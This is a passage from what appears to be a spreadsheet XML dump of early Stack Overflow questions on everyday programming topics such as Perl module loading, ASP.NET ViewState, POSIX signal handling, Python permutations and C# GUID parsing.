&lt;p&gt;When I try running a test.pl script:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;$ perl test.pl&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/perl
use lib "/homes/foobar/lib/lib64/perl5/site_perl/5.8.8/x86_64-linux-thread-multi";
use Text::CSV_XS;
print "test";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get&lt;/p&gt;
&lt;pre&gt;
Can't load '/homes/foobar/lib/lib64/perl5/site_perl/5.8.8/x86_64-linux-thread-multi/auto/Text/CSV_XS/CSV_XS.so' for module Text::CSV_XS: /homes/foobar/lib/lib64/perl5/site_perl/5.8.8/x86_64-linux-thread-multi/auto/Text/CSV_XS/CSV_XS.so: cannot open shared object file: No such file or directory at /www/common/perl/lib/5.8.2/i686-linux/DynaLoader.pm line 229.
at test.pl line 6
Compilation failed in require at test.pl line 6.
BEGIN failed--compilation aborted at test.pl line 6.
&lt;/pre&gt;
&lt;p&gt;I traced the error back to DynaLoader.pm it happens at this line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Many dynamic extension loading problems will appear to come from
# this section of code: XYZ failed at line 123 of DynaLoader.pm.
# Often these errors are actually occurring in the initialisation
# C code of the extension XS file. Perl reports the error as being
# in this perl code simply because this was the last perl code
# it executed.
my $libref = dl_load_file($file, $module-&amp;gt;dl_load_flags) or
    croak("Can't load '$file' for module $module: ".dl_error());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;b&gt;CSV_XS.so exists in the above directory&lt;/b&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Build new computer using Scripts</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to automate the process of setting up a new PC, this would include downloading and installing the latest windows and office updates; installing software from a network share (some software will require a restart so the script would need to be able to login and continue) adding PC to a domain and setting up local user accounts.&lt;/p&gt;
&lt;p&gt;Is this possible and what would be the best scripting language to achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generate a Sandcastle help file for a website without the "Xml Documentation File" option</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to generate a Sandcastle help file for a website. In the properties window for project, there aren't any options for creating the XML Documentation File required for Sandcastle.&lt;/p&gt;
&lt;p&gt;The Build tab in the property pages only contains options for: Start Action, Build Solution Action, and Accessibility validation. I don't have any options for Output, or XML documentation file, like my other projects have.&lt;/p&gt;
&lt;p&gt;The website I'm working with does not have an actual .proj file, which could be the problem. If this is the problem, what is the best way of creating one for a project that is under source control and being worked on by many people with minimal disruption?&lt;/p&gt;
&lt;p&gt;This is using Visual Studio 2005 professional.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is IIS7 migration a piece of cake</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wish to migrate a website to windows 2008 platform, is there any obvious pitfalls i should be aware of?&lt;/p&gt;
&lt;p&gt;code base is c# 3.5,asp.net with ms ajax.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I store a database ID field in ViewState?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to retrieve a record from a database, display it on a web page (I'm using ASP.NET) but store the ID (primary key) from that record somewhere so I can go back to the database later with that ID (perhaps to do an update).&lt;/p&gt;
&lt;p&gt;I know there are probably a few ways to do this, such as storing the ID in ViewState or a hidden field, but what is the best method and what are the reasons I might choose this method over any others?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some project management tips and processes for a single-developer team?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I usually have some project that I can do alone that take around 6 months to 1 year. I always try to have some "release" date and write few documentations (external to the code).&lt;/p&gt;
&lt;p&gt;My question is, what type of management do you use when you do not have a team with you but you are alone?&lt;/p&gt;
&lt;p&gt;Example, I was thinking about Agile Programming BUT not sure if you can really say that you are Agile when you are alone? What do you use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding First Row in a RDLC Table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table in a RDLC report which is utilized as a subreport, and the first column of this table is a static string. Does anyone know how I can determine if a row is the first in the table.  I tried using "=First("My String")" but it didn't work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Portable way to catch signals and report problem to the user</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If by some miracle a segfault occurs in our program, I want to catch the SIGSEGV and let the user (possibly a GUI client) know with a single return code that a serious problem has occurred.  At the same time I would like to display information on the command line to show which signal was caught.&lt;/p&gt;
&lt;p&gt;Today our signal handler looks as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void catchSignal (int reason) {
  std :: cerr &amp;lt;&amp;lt; "Caught a signal: " &amp;lt;&amp;lt; reason &amp;lt;&amp;lt; std::endl;
  exit (1);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can hear the screams of horror with the above, as I have read from this &lt;a href="http://groups.google.com/group/gnu.gcc.help/browse_thread/thread/6184795b39508519/f775c1f48284b212?lnk=gst&amp;amp;q=deadlock#" rel="nofollow"&gt;thread&lt;/a&gt; that it is evil to call a non-reentrant function from a signal handler.&lt;/p&gt;
&lt;p&gt;Is there a portable way to handle the signal and provide information to users?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Or at least portable within the POSIX framework?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to determine the name of your machine in a .NET app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to get the name of the machine my .NET app is running on.  What is the best way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone programming - impressions, opinions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been programming in C,C++,C# and a few other languages for many years, mainly for Windows and Linux but also embedded platforms. Recently started to do some iPhone programming as a side project so I'm using Apple platforms for the first time since my Apple II days. I'm wondering what other developers that are coming to Mac OSX, Xcode and iPhone SDK think. Here are my impressions, so far:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Mac OSX: very confusing, I tend to end up with too many open windows and don't know what's where. Luckily there's the bird's eye view, without it I'd be lost. With the shell at least there's all the familiar stuff so that helps me a lot.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Xcode: doesn't feel as good as VisualStudio or Eclipse, the two environments I'm familiar with. I think I could get used to it but I'm wondering if Apple wouldn't be better off with Eclipse. Before I found the setting where all the windows are stuck together I hated it, now I can tolerate it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;iPhone SDK: strange indeed. I understand Apple's desire to control their environment but in this day and age it just seems a little sleazy and they are missing out on so much by destroying developer goodwill.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Objective-C: I've known about it for years but never even took a look at it. The syntax is off-putting but I'm actually very intrigued by the language. I think it's an interesting third leg between C++ and C#, both of which I like a lot. Is there any chance Obj-C will break out of the Mac sandbox due to the uptick in the popularity of Apple technology?&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Curious to read your thoughts,&lt;/p&gt;
&lt;p&gt;Andrew&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Invalid postback or callback argument</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an ASP.net application that works fine in the development environment but in the production environment throws the following exception when clicking a link that performs a postback.  Any ideas?&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Invalid postback or callback argument.
  Event validation is enabled using
  in configuration or &amp;lt;%@ Page
  EnableEventValidation="true" %&gt; in a
  page.  For security purposes, this
  feature verifies that arguments to
  postback or callback events originate
  from the server control that
  originally rendered them.  If the data
  is valid and expected, use the
  ClientScriptManager.RegisterForEventValidation
  method in order to register the
  postback or callback data for
  validation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; This seems to only be happening when viewed with IE6 but not with IE7, any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery Menu and ASP.NET Sitemap</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use an &lt;a href="http://en.wikipedia.org/wiki/ASP.NET"&gt;ASP.NET&lt;/a&gt; web.sitemap with a jQuery &lt;a href="http://users.tpg.com.au/j_birch/plugins/superfish/"&gt;Superfish&lt;/a&gt; menu?  &lt;/p&gt;
&lt;p&gt;If not, are there any standards based browser agnostic plugins available that work with the web.sitemap file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Specifying location of new inlineshape in Word VBA?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a document "wizard" for the company that I work for. It's a .dot file with a header consisting of some text and some form fields, and a lot of VBA code. The body of the document is pulled in as an OLE object from a separate .doc file.&lt;/p&gt;
&lt;p&gt;Currently, this is being done as a &lt;code&gt;Shape&lt;/code&gt;, rather than an &lt;code&gt;InlineShape&lt;/code&gt;. I did this because I can absolutely position the Shape, whereas the InlineShape always appears at the beginning of the document.&lt;/p&gt;
&lt;p&gt;The problem with this is that a &lt;code&gt;Shape&lt;/code&gt; doesn't move when the size of the header changes. If someone needs to add or remove a line from the header due to a special case, they also need to move the object that defines the body. This is a pain, and I'd like to avoid it if possible.&lt;/p&gt;
&lt;p&gt;Long story short, how do I position an &lt;code&gt;InlineShape&lt;/code&gt; using VBA in Word?&lt;/p&gt;
&lt;p&gt;The version I'm using is Word 97.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how do I query multiple SQL tables for a specific key-value pair?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Situation: A PHP application with multiple installable modules creates a new table in database for each, in the style of mod_A, mod_B, mod_C etc. Each has the column section_id.&lt;/p&gt;
&lt;p&gt;Now, I am looking for all entries for a specific section_id, and I'm hoping there's another way besides "Select * from mod_a, mod_b, mod_c ... mod_xyzzy where section_id=value"... or even worse, using a separate query for each module.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flash vs. Silverlight</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are building a training website where we need to track viewers watching videos and store detailed info about the viewing (when they paused, if they watched the whole video etc)&lt;/p&gt;
&lt;p&gt;What should we consider when deciding between the two technologies?&lt;/p&gt;
&lt;p&gt;I forgot to add. This is for an in house app. We have complete control over the environment. If it this was for a public application I would definitely go with Flash.&lt;/p&gt;
&lt;p&gt;I'm just looking for technical advantages of one over the other from someone who has used both.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Query Help: Transforming Dates In A Non-Trivial Way</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table with a "Date" column, and I would like to do a query that does the following:&lt;/p&gt;
&lt;p&gt;If the date is a &lt;strong&gt;Monday&lt;/strong&gt;, &lt;strong&gt;Tuesday&lt;/strong&gt;, &lt;strong&gt;Wednesday&lt;/strong&gt;, or &lt;strong&gt;Thursday&lt;/strong&gt;, the displayed date should be shifted up by 1 day, as in &lt;pre&gt;DATEADD(day, 1, [Date])&lt;/pre&gt;  On the other hand, if it is a &lt;strong&gt;Friday&lt;/strong&gt;, the displayed date should be incremented by 3 days (i.e. so it becomes the following &lt;em&gt;Monday&lt;/em&gt;).&lt;/p&gt;
&lt;p&gt;How do I do this in my SELECT statement?  As in,&lt;/p&gt;
&lt;pre&gt;SELECT somewayofdoingthis([Date]) FROM myTable&lt;/pre&gt;
&lt;p&gt;(This is SQL Server 2000.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tips on refactoring an outdated database schema</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Being stuck with a legacy database schema that no longer reflects your data model is every developer's nightmare.  Yet with all the talk of refactoring code for maintainability I have not heard much of refactoring outdated database schemas.  &lt;/p&gt;
&lt;p&gt;What are some tips on how to transition to a better schema without breaking all the code that relies on the old one?  I will propose a specific problem I am having to illustrate my point but feel free to give advice on other techniques that have proven helpful - those will likely come in handy as well.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;My example:&lt;/p&gt;
&lt;p&gt;My company receives and ships products.  Now a product receipt and a product shipment have some very different data associated with them so the original database designers created a separate table for receipts and for shipments.  &lt;/p&gt;
&lt;p&gt;In my one year working with this system I have come to the realization that the current schema doesn't make a lick of sense.  After all, both a receipt and a shipment are basically a transaction, they each involve changing the amount of a product, at heart only the +/- sign is different.  Indeed, we frequently need to find the total amount that the product has changed over a period of time, a problem for which this design is downright intractable.  &lt;/p&gt;
&lt;p&gt;Obviously the appropriate design would be to have a single Transactions table with the Id being a foreign key of either a ReceiptInfo or a ShipmentInfo table.  Unfortunately, the wrong schema has already been in production for some years and has hundreds of stored procedures, and thousands of lines of code written off of it.  How then can I transition the schema to work correctly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to generate all permutations of a list in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you generate all the permutations of a list in Python, independently of the type of elements in that list?&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;permutations([])
[]
permutations([1])
[1]
permutations([1, 2])
[1, 2]
[2, 1]
permutations([1, 2, 3])
[1, 2, 3]
[1, 3, 2]
[2, 1, 3]
[2, 3, 1]
[3, 1, 2]
[3, 2, 1]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT:
Eliben pointed to a solution that's similar to mine although simpler, so I'm choosing it as the accepted answer, although Python 2.6+ has a builtin solution in the &lt;strong&gt;itertools&lt;/strong&gt; module:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import itertools
itertools.permutations([1, 2, 3])
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Flash/FLEX 3 Argument Error 2082</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone else experienced this error? Sometimes it pops up at the beginning of loading the application with Argument Error 2082. The only way I can solve it is by rebooting my machine. Restarting the browser doesn't even solve it. I have read about some solutions on the web, but I am interested in knowing what others have tried using that solved the error for them? Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF Validation for the whole form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been seriously disappointed with WPF validation system. Anyway! How can I validate the complete form by clicking the "button"? &lt;/p&gt;
&lt;p&gt;For some reason everything in WPF is soo complicated! I can do the validation in 1 line of code in ASP.NET which requires like 10-20 lines of code in WPF!!&lt;/p&gt;
&lt;p&gt;I can do this using my own ValidationEngine framework: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Customer customer = new Customer();
customer.FirstName = "John";
customer.LastName = String.Empty;
ValidationEngine.Validate(customer);
if (customer.BrokenRules.Count &amp;gt; 0)
{
   // do something display the broken rules! 
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Always have to use .css files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are .css files always needed? Or may I have a .css "basic" file and store other style items inside the HTML page?&lt;/p&gt;
&lt;p&gt;Does padding, borders and so on always have to be defined into a .css file stored separately, or may I use them normally into an HTML page?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any good SQL Anywhere database schema comparison tools?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any good database schema comparison tools out there that support Sybase SQL Anywhere version 10?  I've seen a litany of them for SQL Server, a few for MySQL and Oracle, but nothing that supports SQL Anywhere correctly.  &lt;/p&gt;
&lt;p&gt;I tried using DB Solo, but it turned all my non-unique indexes into unique ones, and I didn't see any options to change that.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I disable the eclipse server startup timeout?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;By default when using a webapp server in Eclipse Web Tools, the server startup will fail after a timeout of 45 seconds.  I can increase this timeout in the server instance properties, but I don't see a way to disable the timeout entirely (useful when debugging application startup).  Is there a way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#: Test if string is a guid without throwing exceptions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to try to convert a string to a Guid, but I don't want to rely on catching exceptions (&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;for performance reasons - exceptions are expensive&lt;/li&gt;
&lt;li&gt;for usability reasons - the debugger pops up &lt;/li&gt;
&lt;li&gt;for design reasons - the expected is not exceptional&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In other words the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static Boolean TryStrToGuid(String s, out Guid value)
{
    try
    {
        value = new Guid(s);
        return true;
    }
    catch (FormatException)
    {
        value = Guid.Empty;
        return false;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is not suitable.&lt;/p&gt;
&lt;p&gt;I would try using RegEx, but since the guid can be parenthesis wrapped, brace wrapped, none wrapped, makes it hard. &lt;/p&gt;
&lt;p&gt;Additionally, I thought certain Guid values are invalid(?)&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Update 1&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/104850/c-test-if-string-is-a-guid-without-throwing-exceptions#137829"&gt;ChristianK&lt;/a&gt; had a good idea to catch only &lt;code&gt;FormatException&lt;/code&gt;, rather than all. Changed the question's code sample to include suggestion.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Update 2&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Why worry about thrown exceptions? Am I really expecting invalid GUIDs all that often? &lt;/p&gt;
&lt;p&gt;The answer is &lt;em&gt;yes&lt;/em&gt;. That is why I am using TryStrToGuid - I &lt;strong&gt;am&lt;/strong&gt; expecting bad data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Example 1&lt;/strong&gt; &lt;a href="http://msdn.microsoft.com/en-us/library/cc144096%28VS.85%29.aspx"&gt;Namespace extensions can be specified by appending a GUID to a folder name&lt;/a&gt;. I might be parsing folder names, checking to see if the text after the final &lt;strong&gt;.&lt;/strong&gt; is a GUID.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;c:\Program Files
c:\Program Files.old
c:\Users
c:\Users.old
c:\UserManager.{CE7F5AA5-6832-43FE-BAE1-80D14CD8F666}
c:\Windows
c:\Windows.old
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Example 2&lt;/strong&gt; I might be running a heavily used web-server wants to check the validity of some posted back data. I don't want invalid data tying up resources 2-3 orders of magnitude higher than it needs to be.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Example 3&lt;/strong&gt; I might be parsing a search expression entered by a user. &lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/Ghb12.png" alt="enter image description here"&gt;&lt;/p&gt;
&lt;p&gt;If they enter GUID's I want to process them specially (such as specifically searching for that object, or highlight and format that specific search term in the response text.)&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Update 3 - Performance benchmarks&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Test converting 10,000 good Guids, and 10,000 bad Guids.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Catch FormatException:
   10,000 good:     63,668 ticks
   10,000 bad:   6,435,609 ticks
Regex Pre-Screen with try-catch:
   10,000 good:    637,633 ticks
   10,000 bad:     717,894 ticks
COM Interop CLSIDFromString
   10,000 good:    126,120 ticks
   10,000 bad:      23,134 ticks
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;p.s. I shouldn't have to justify a question.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dealing with the rate of change in software development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am primarily a .NET developer, and in that sphere alone there are at any given time probably close to a dozen fascinating emerging technologies, some of them real game-changers, that I would love to delve into. &lt;/p&gt;
&lt;p&gt;Sadly, this appears to be beyond the limits of human capacity. &lt;/p&gt;
&lt;p&gt;I read an article by Rocky Lhotka (.NET legend, inventor of CSLA, etc) where he mentioned, almost in passing, that last year he felt very terribly overwheled by the rate of change. He made it sound like maybe it wasn't possible to stay on the bleeding edge anymore, that maybe he wasn't going to try so hard because it was futile. &lt;/p&gt;
&lt;p&gt;It was a surprise to me that true geniuses like Lhotka (who are probably expected to devote a great deal of their time to playing with the latest technology and should be able to pick things up quickly) also feel the burn!&lt;/p&gt;
&lt;p&gt;So, how do you guys deal with this? Do you just chalk it up to the fact that development is vast, and it's more important to be able to find things quickly than to learn it all? Or do you have a continuing education strategy that actually allows you to stay close to the cutting edge?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a .NET performance counter to show the rate of p/invoke calls being made?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a .NET performance counter to show the rate of p/invoke calls made?  I've just noticed that the application I'm debugging was making a call into native code from managed land within a tight loop.  The intended implementation was for a p/invoke call to be made once and then cached.  I'm wondering if I could have noticed this mistake via a CLR Interop or Remoting .NET performance counter.  Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any ORM tools for Haskell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to interact with a database using Haskell?  I'm accustomed to using some sort of ORM (Django's ORM, hibernate, etc.) and something similar would be nice when creating apps with &lt;a href="http://www.happs.org/"&gt;HAppS&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I'd like to be free to choose from Postgresql MySql and SQLite as far as the actual databases go.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should a blog be structured to easily extract its data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently using Wordpress to run my website.  However, with each new release I become more concerned with software bloat and the convoluted table structures used to store my data.  Maybe this is a fruitless pursuit.  Features are always added to blogging software until it claims to be a CMS--and at that point your data is probably stuck.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS: Display differences</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the difference between display:block and display:inline&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why use WinDbg vs the Visual Studio (VS) debugger?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the major reasons for using &lt;a href="http://en.wikipedia.org/wiki/WinDbg"&gt;WinDbg&lt;/a&gt; vs the Visual Studio debugger?&lt;/p&gt;
&lt;p&gt;And is it commonly used as a complete replacement for the Visual Studio debugger, or more for when the need arises.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where'd my generic ActionLink go?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Moved from preview 2 to preview 5 and now my Html.ActionLink calls are all failing.  It appears that the generic version has been replaced with a non-type safe version.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// used to work
&amp;lt;li&amp;gt;
  &amp;lt;%= Html.ActionLink&amp;lt;HomeController&amp;gt;(c =&amp;gt; c.Index(), "Home")%&amp;gt;
&amp;lt;/li&amp;gt;
// what appears I can only do now
&amp;lt;li&amp;gt;
  &amp;lt;%= Html.ActionLink&amp;lt;HomeController&amp;gt;("Index", "Home")%&amp;gt;
&amp;lt;/li&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why did The Gu do this?  Has it been moved to Microsoft.Web.Mvc or somewhere else as a "future"?  Is there a replacement that is generic?  Halp! &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automated way to detect tests that can't fail, checked in to get by minmum code coverage?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a dev, that will get around our code coverage by writing tests that never fail.&lt;/p&gt;
&lt;p&gt;The code is just atrocious, but the tests never catch it because they assert(true).&lt;/p&gt;
&lt;p&gt;I code review, but I can't do everyones work for them, all the time. How do you get people like this motivated to make good software?&lt;/p&gt;
&lt;p&gt;Is there a build plugin for detecting tests that can't fail?&lt;/p&gt;
&lt;p&gt;C#, mbUnit tests.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Java-based ray tracing model that can be adapted for use in underwater acoustics?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for an open-source Java-based raytracing system suitable for use in modeling underwater ray-based acoustics.  Such a package might be similar to the Comprehensive Acoustic System Simulation (CASS) with the Gaussian Ray Bundle (GRAB) but I would prefer an open-source, free-to-use or free-to-modify model that I can use in presentations to an open forum (e.g., JavaOne).&lt;/p&gt;
&lt;p&gt;The best model for my needs would provide ray path modeling based on an environmental model, bathymetry (also known as ocean bottom topography) and emitter frequency spectra.  Note: multipath effects (including reflection and refraction) are my primary points of interest so the best package would provide that right out of the box.&lt;/p&gt;
&lt;p&gt;Slightly less optimal would be a standard Java-based ray-tracing package (optical or acoustic) that can handle a a varying speed through the medium.  Another way of saying this would be that the index of refraction varies in a continuous fashion throughout the medium (though its first derivative might not be continuous).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are indexes and how can I use them to optimize queries in my database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am maintaining a pretty sizable application and database and am noticing some poor database performance in a few of our stored procedures.&lt;/p&gt;
&lt;p&gt;I always hear that "adding an index" can be done to help performance. I am certainly no DBA, and I do not understand what indexes are, why they help, and how to create them.&lt;/p&gt;
&lt;p&gt;I basically need an indexes 101. &lt;/p&gt;
&lt;p&gt;Can anyone give me resources so that I can learn?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I stop Blend 2.5 June Preview replacing Canvas.ZIndex with Panel.ZIndex on SL1.0 XAML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Silverlight 1.0 application that I edit with Blend 2.5.  Whenever I touch a &lt;code&gt;UIElement&lt;/code&gt; in the designer that has a Canvas attribute such as &lt;code&gt;Canvas.ZIndex="1"&lt;/code&gt;, when it updates the XAML, it changes the Canvas prefix to Panel, leaving &lt;code&gt;Panel.ZIndex="1"&lt;/code&gt;, causing the page to fail to load.&lt;/p&gt;
&lt;p&gt;How do I make it stop the insanity!?!&lt;/p&gt;
&lt;p&gt;I have uninstalled 2.5 and reinstalled an older Blend 2 preview and that was better, but then compatibility with VS2k8 was not as good, and I'm also working on some SL2.0 projects from time to time, as well as WPF apps, both of which I prefer Blend 2.5 for.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VSTO Excel 2007 PivotTable, having a PivotField in more than one column</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using VSTO with Excel 2007 to generate PivotTables and PivotCharts dynamically.
I am having a problem when I need to have a PivotField in more than one column. &lt;/p&gt;
&lt;p&gt;To accomplish this I create a PivotTable in Excel and serialize its properties into an XML document, which I then use to rebuild the PivotTable.&lt;/p&gt;
&lt;p&gt;Ie: as a Value and as a Column&lt;/p&gt;
&lt;p&gt;This is possible when building the PivotTable in Excel. Has found a way to do this using C# ?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://blogs.msdn.com/andreww/archive/2008/07/25/creating-a-pivottable-programmatically.aspx" rel="nofollow"&gt;Creating a PivotTable Programmatically&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good functional language on which to build a web service?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a functional language that has good support and tools for building web services?  I've been looking at Scala (which compiles to the JVM and can use the Java libraries) and F# (which is .NET), but these are young and have some inefficiencies.  Scala in particular doesn't support tail-call elimination except in self-recursive functions, which limits the kinds of composition you can do (this is a fundamental limitation of the JVM).  F# is very new and doesn't seem to be fully supported yet, which makes it riskier than a more conventional language.&lt;/p&gt;
&lt;p&gt;Is it possible to build a web service using Haskell, ML, or any of the other more traditional functional languages, or would it be better to go with Scala or F#?  Any other suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some excellent examples of user sign-up forms on the web?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to get a sampling of what people think are the best sign-up forms.  Good design, usability.  Smart engineering.  Helpful feedback.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET String.Format() to add commas in thousands place for a number</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to add a comma in the thousands place for a number. &lt;code&gt;String.Format()&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a string type of a hex value that represents an upper ascii value character</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Part of our app parses RTF documents and we've come across a special character that is not translating well.  When viewed in Word the character is an elipsis (...), and it's encoded in the RTF as ('85).&lt;/p&gt;
&lt;p&gt;In our vb code we converted the hex (85) to int(133) and then did Chr(133) to return (...)&lt;/p&gt;
&lt;p&gt;Here's the code in C# - problem is this doesn't work for values above 127.  Any ideas?&lt;/p&gt;
&lt;p&gt;Calling code :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// S is Hex number!!!
return Convert.ToChar(HexStringToInt(s)).ToString();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Helper method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private static int HexStringToInt(string hexString)
{
    int i;
    try
    {
        i = Int32.Parse(hexString, NumberStyles.HexNumber);
    }
    catch (Exception ex)
    {
        throw new ApplicationException("Error trying to convert hex value: " + hexString, ex);
    }
    return i;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>SEO and hard links with dynamic URLs</t>
  </si>
  <si>
